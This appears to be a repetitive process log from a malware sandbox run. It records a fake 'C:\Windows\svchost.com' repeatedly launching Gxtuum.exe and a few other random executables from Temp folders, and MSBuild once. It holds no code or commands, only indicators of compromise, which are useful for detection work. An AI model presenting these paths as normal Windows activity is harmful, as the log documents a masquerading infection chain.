"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100362~1\trru7rd2.exe"
C:\Users\Admin\AppData\Local\Temp\100362~1\trru7rd2.exe
C:\Users\Admin\AppData\Local\Temp\100362~1\trru7rd2.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100419~1\zq6a1iqg.exe"
C:\Users\Admin\AppData\Local\Temp\100419~1\zq6a1iqg.exe
C:\Users\Admin\AppData\Local\Temp\100419~1\zq6a1iqg.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100441~1\C4D922~1.EXE"
C:\Users\Admin\AppData\Local\Temp\100441~1\C4D922~1.EXE
C:\Users\Admin\AppData\Local\Temp\100441~1\C4D922~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100441~2\B6B0BA~1.EXE"
C:\Users\Admin\AppData\Local\Temp\100441~2\B6B0BA~1.EXE
C:\Users\Admin\AppData\Local\Temp\100441~2\B6B0BA~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
